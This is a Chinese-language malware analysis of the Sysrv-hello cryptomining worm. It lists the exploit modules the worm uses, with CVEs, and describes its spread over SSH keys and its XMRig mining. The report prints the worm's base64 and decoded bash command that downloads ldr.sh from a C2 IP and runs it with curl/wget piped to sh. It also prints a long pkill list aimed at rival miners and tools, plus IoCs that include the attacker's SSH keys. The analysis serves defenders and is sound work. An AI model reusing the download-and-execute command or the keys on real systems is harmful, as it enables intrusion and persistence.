概述
该样本为Sysrv-hello挖矿样本,目前该病毒家族的漏洞利用模块已达20个。Sysrv-hello家族最早出现
于2020年12月份,至今其版本迭代已数十次,不断的新增攻击模块,是一个新型且十分活跃的家族。
挖矿程序的特征
- 挖矿程序会占用CPU进行超频运算,导致CPU严重损耗,并且影响服务器上的其他应用。
- 挖矿程序还具备蠕虫化特点,当安全边界被突破时,挖矿病毒会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。
- 挖矿程序具有联动作用,在清理过程中会存在处理不及时或清理不干净导致挖矿病毒反复发生、出现恶意脚本替换系统命令的现象,从而导致执行系统命令时触发恶意脚本执行(例如:xorddos)。因此,需要在挖矿程序的一个执行周期内,尽快将被入侵服务器上的木马程序和持续化后门清理干净,否则容易导致挖矿病毒频繁复发。
样本文件信息
该样本为公司样本,故不提供相关特征。
技术分析
该样本使用随机IP对其进行端口扫描,如果端口开放则进行漏洞攻击
漏洞利用模块列表
JBOOS反序列化漏洞
Supervisord远程命令执行漏洞(CVE-2017-11610)利用模块:
Laravel Debug mode RCE(CVE_2021_3129)漏洞利用模块:
Confluence RCE(CVE-2019-3396)漏洞利用模块:
Phpunit RCE(CVE-2017-9841)漏洞利用模块:
struts2-s2-045 RCE(CVE-2017-5638)漏洞利用模块:
Jenkins RCE CVE-2018-1000861漏洞利用模块:
Jupyter未授权访问漏洞利用模块:
Nexus Repository Manager 3 RCE(CVE-2019-7238)漏洞利用模块:
Tomcat 弱口令爆破模块:
WordPress暴力破解:
XXL-JOB executor 未授权访问漏洞利用模块:
Hadoop YARN REST API未授权漏洞利用:
ThinkPHP5 RCE漏洞利用模块:
WebLogic RCE (CVE-2020-14882)漏洞利用模块:
Redis未授权写漏洞利用模块:
SSH爆破:
PostgreSQL RCE(CVE-2019-9193)漏洞利用模块:
Spring Cloud Gateway Actuator RCE漏洞(CVE-2022-22947)
病毒传播方式
利用服务器SSH密匙进行横向移动。
下载恶意主脚本ldr.sh
横向传播模块sys.x86_64运行后还会执行如下base64编码的shell命令,以下载恶意主脚本ldr.sh,从而
实现持久化控制。
1
2
3
4
5
| bash -c
{echo,KGN1cmwgMTk0LjE0NS4yMjcuMjEvbGRyLnNoP2UzOWRjMnx8Y3VybCAxOTQuMTQ1LjIyNy4yMS
9sZHIuc2g/ZTM5ZGMyfHxjdXJsIC1xxxxxxxxxxxxxxxI3LjIxL2xkci5zaD9lMzlkYzJ8fGN1cmwgLW
sgMTk0LjE0NS4yMjcuxxxxxxxxxxxxxxxxRjMnx8d2dldCAtcSAtTy0gMTk0LjE0NS4yMjcuMjEvbG
RyLnNoP2UzOWRjMil8c2ggMT4vZGV2L251bGwgMj4mMSAm}{base64,-d}{bash,-i}t
|
解密后内容如下:
1
2
3
| bash -c {echo,(curl 194.145.xx.xx/ldr.sh?e39dc2curl 194.145.xx.xx/ldr.sh?
e39dc2curl -k 194.145.xx.xx/ldr.sh?e39dc2curl -k 194.145.xx.xx/ldr.sh?
e39dc2wget -q -O- 194.145.xx.xx/ldr.sh?e39dc2)sh 1>/dev/null 2>&1 &}
|
主要功能为如下几点:
1、关闭防火墙
2、结束下列进程
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
| pkill -9 -f b64decode
pkill -9 -f MCf8
pkill -9 -f mysqldd
pkill -9 -f monero
pkill -9 -f kinsing
pkill -9 -f sshpass
pkill -9 -f sshexec
pkill -9 -f cnrig
pkill -9 -f attack
pkill -9 -f dovecat
pkill -9 -f javae
pkill -9 -f donate
pkill -9 -f 'scan\.log'
pkill -9 -f xmr-stak
pkill -9 -f crond64
pkill -9 -f stratum
pkill -9 -f /tmp/java
pkill -9 -f pastebin
pkill -9 -f '/tmp/\.'
pkill -9 -f 'so\.txt'
pkill -9 -f 'bash -s 3673'
pkill -9 -f 8005/cc5
pkill -9 -f /tmp/system
pkill -9 -f '\./cliented'
pkill -9 -f '\.inis'
pkill -9 -f certutil
pkill -9 -f excludefile
pkill -9 -f agettyd
pkill -9 -f kthreaddkk
pkill -9 -f /dev/shm
pkill -9 -f /var/tmp
pkill -9 -f '\./python'
pkill -9 -f '\./crun'
pkill -9 -f 'bash -s kthreaddk'
pkill -9 -f '\./\.'
pkill -9 -f '118/cf\.sh'
pkill -9 -f '\./lin64'
pkill -9 -f 'confluence/install\.sh'
pkill -9 -f 'unls64\.sh'
pkill -9 -f '\./system-xfwm4-session'
pkill -9 -f '\./httpd'
pkill -9 -f xmrig
pkill -9 -f kthreaddi
pkill -9 -f loligang
pkill -9 '\.6379'
pkill -9 'load\.sh'
pkill -9 'init\.sh'
pkill -9 'solr\.sh'
pkill -9 '\.rsyslogds'
pkill -9 sysDworker
pkill -9 pnscan
pkill -9 masscan
pkill -9 juiceSSH
pkill -9 sysguard
pkill -9 kdevtmpfsi
pkill -9 solrd
pkill -9 polska
pkill -9 meminitsrv
pkill -9 networkservice
pkill -9 sysupdate
pkill -9 phpguard
pkill -9 phpupdate
pkill -9 networkmanager
pkill -9 knthread
pkill -9 mysqlserver
pkill -9 gitlabkill
pkill -9 watchbog
pkill -9 bashirc
pkill -9 zgrab
|
3、/proc目录下保留kthreaddk进程,清理掉其他两种情况的进程
4、强制卸载阿里云盾(安骑士)
5、结束自身老版本病毒的进程,判断是否有进程kthreaddk。如果没有则下载最
新版本
6、利用服务器SSH密钥进行横向移动
XMRig挖矿
主程序运行后样本会创建守护线程(go routine)来守护矿机进程和文件,再将XMRig挖矿程序释放后
重命名为kthreaddk,以及挖矿配置文件config.json进行挖矿。
同时,为了增强挖矿活动隐蔽性,门罗币挖矿程序在被加载到内存后会被横向传播模块删除(挖矿进程
若被kill掉,会由横向传播模块重新释放)。
矿池地址为:194.145.xx.xx:5443,矿池与C2地址一致,并且本地配置和抓包都没有看到钱包地址,
因此推测此版本使用的是病毒作者自建的矿池。
IoCs
IP: 194.145.xx.xx
矿池:194.145.xx.xx:5443
Url
1
2
| http://194.145.xx.xx/ldr.sh
http://194.145.xx.xx/sys.x86_64
|
MD5
文件名
备注
5EA36231B6xxxxx5491BE4
ldr.sh
恶意主脚本
35ABF3204E5A2xxxxxA5AB9B19582
sys.x86_64
Linux版横向传播模块
ssh公钥
1
2
3
4
5
6
| ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDaR3U1flcG9SHro9t6G8jRQsUR5ozQjsgx7x30UTwcxnrbk74L
IHeTBTNZ3nak2JeqEmT85xxxxxxxxxxxXyZMNkjWsbnPuk0yzQ7i33hlLdrDeO9+XUV
duIjfbMtrsSjg1Sk7GG9jTDi7xxxxxxxxxxxxxxxxxxxxxxxFCHzY93o6g2rHtkXEpgZ5qOZeMMONvC
z6aUlesOWsrYA9xE6zlgvaq/kmHyZr/HmxdA9moMd+yPrZfG055VWSRT9ijv4XCRrunXZvg7pZtI+kJs
L/P7eW9/mkA9Z3TucP2buHy/TBFgyywZT1Etwppzz1nzTIKEGNs9
|
openssh私钥
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA2kd1NX5XBvUh66PbehvI0ULFEeaM0I7IMe8d9FE8HMZ625O+CyB3
kwUzWd52pNiXqhJk/OXcYKNsdi+vJAA09Gj1/QGoIWV8mTDZI1rG5z7pNMs0O4t94ZS3aw
3jvfl1FXbiI3xxxxxxxxxxxxxxxxxxxxxxxxxxxxx5Jh8ma/x5sXQPZqDHfsj62XxtOeVV
kkU/Yo7+Fwka7p12b4O6WbSPpCbC/z+3lvf5pAPWd07nD9m7h8v0wRYMssGU9RLcKac89Z
80yChBjbPQAAA8B/rfQef630HgAAAAdzc2gtcnNhAAABAQDaR3U1flcG9SHro9t6G8jRQs
UR5ozQjsgx7x30UTwcxnrbk74LIHeTBTNZ3nak2JeqEmT85dxgo2x2L68kADT0aPX9Aagh
ZXyZMNkjWsbnPuk0yzQ7i33hlLdrDeO9+XUVduIjfbMtrsSjg1Sk7GG9jTDi7vBQvqHbQe
rWu6cycDuQKb8mmFCHzY9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxtI+kJsL/P7eW9/mkA9Z3
TucP2buHy/TBFgyywZT1Etwppzz1nzTIKEGNs9AAAAAwEAAQAAAQBwJhbKjUcZhAkRkPbL
HktneO7X66Sd4z5oqXqydKp1/mRRPO9/uAa3uwxPOEWtHLuP3jOU3GUGIfEwJ//Md269xM
/eVmOUBRinfLmTuKhJV8FqJp2Hmnvq0wYKMvC4QtstVA+MPKE673iIqolq0yjEwy5C6pD+
a3Otu4h1G6Uj/CKTUDSs72XYqdh3SzGtKwHstrFSBjckJ6g7U98u/mV9vSIMWxBNeHJM1P
aj/Yg1azyAcUGWO3zxVFtDbKNwyo6qZVjB0wIMOZq3rMMq7OHIotiutYZHW9W+0gXLgH4A
xsQiQuNftmF8WZyLhV4pa3WSEetul1duVEkrsPUfwfoBAAAAgQC4qOdMPYfAkQRKROjIIN
MKmx/+oJl5kCe1nErljyA7ZhhX64RZmH2cUPq3ytrLL4IDfCe7jEKeiemW1jtH3x35vsmX
ORzPv7z+J3kpWQrWzEv6/Q4vqEBzk7uHi3lUebfDWdVwG0kGvPVWEJO50HodG0MIeiPEWX
r5IjCrAEuxBgAAAIEA/hTNaq5WmXwiQfuVq2tTp5GgIYzcmkCZwZ+AsvRXiKT8oTuJtY3P
0Zkgp1qoaN2enE3kikoReZPWA7b2gL9LjZo/v9QQc/7U4hIXP1ZC6xp22r9V08GtHUkNxp
mok0Wl4B5LepQx505mB1RGprx79GEYN3nIz6MjHqt039jdevEAAACBANvtcRIDU2ShmQwn
LhgZxZWLJIuI+oo686Gs+iHZ3IACrUzqAwsg5kCE7n1l2JX6IhqVQmQlEFAH3PlXsiXy8f
LnBwrKLlLLR4q76nebCKMJid0AnPxI8VNnEtCltM9SjR+FTDpRStEQ12iqzxb1vOMyG0NN
KlfhEQR66qqhkW0NAAAAA2tAawECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----
|